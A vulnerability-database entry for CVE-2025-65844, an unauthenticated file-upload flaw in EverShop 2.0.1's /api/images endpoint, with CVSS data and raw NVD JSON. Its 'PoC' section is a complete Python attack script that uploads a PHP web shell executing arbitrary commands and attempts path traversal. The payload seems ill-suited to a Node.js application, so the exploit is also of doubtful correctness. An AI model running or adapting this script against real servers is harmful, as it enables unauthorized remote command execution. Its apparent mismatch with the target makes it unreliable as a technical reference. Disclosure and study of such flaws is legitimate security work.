Security Vulnerability Report
CVE-2025-65844 CVSS 7.5 HIGH

CVE-2025-65844

Published: 2025-12-02 18:15:49
Last Modified: 2025-12-06 04:15:47

Description

EverShop 2.0.1 allows a remote unauthenticated attacker to upload arbitrary files and create directories via the /api/images endpoint. The endpoint is accessible without authentication by default, and server-side validation of uploaded files is insufficient. This can be abused to upload arbitrary content (including non-image files) which could impersonate user/admin login panels (exfiltrating credentials) and to perform a denial-of-service attack by exhausting disk space.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:evershop:evershop:2.0.1:*:*:*:*:node.js:*:* - VULNERABLE
EverShop 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-65844 PoC - EverShop 2.0.1 Arbitrary File Upload Author: Security Researcher """ import requests import sys import random import string def generate_random_string(length=8): """Generate random string for filename""" return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def upload_webshell(target_url, webshell_content=None): """ Upload malicious webshell to EverShop server """ if webshell_content is None: webshell_content = '''<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> ''' endpoint = f"{target_url.rstrip('/')}/api/images" filename = f"{generate_random_string()}.php" files = { 'file': (filename, webshell_content, 'application/x-php') } data = { 'folder': '../../../public/uploads' # Path traversal attempt } print(f"[*] Target: {target_url}") print(f"[*] Uploading webshell to {endpoint}") try: response = requests.post(endpoint, files=files, data=data, timeout=30) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] File uploaded successfully!") print(f"[+] Webshell location: {target_url}/uploads/{filename}") print(f"[+] Usage: {target_url}/uploads/{filename}?cmd=whoami") return True else: print("[-] Upload failed!") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-65844.py <target_url>") print("Example: python3 cve-2025-65844.py http://victim.com") sys.exit(1) target = sys.argv[1] upload_webshell(target) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65844", "sourceIdentifier": "[email protected]", "published": "2025-12-02T18:15:49.243", "lastModified": "2025-12-06T04:15:47.380", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "EverShop 2.0.1 allows a remote unauthenticated attacker to upload arbitrary files and create directories via the /api/images endpoint. The endpoint is accessible without authentication by default, and server-side validation of uploaded files is insufficient. This can be abused to upload arbitrary content (including non-image files) which could impersonate user/admin login panels (exfiltrating credentials) and to perform a denial-of-service attack by exhausting disk space."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:evershop:evershop:2.0.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "2D3A8F90-D61A-4B77-9A57-001AB1BA08DF"}]}]}], "references": [{"url": "https://github.com/evershopcommerce/evershop/issues/819", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}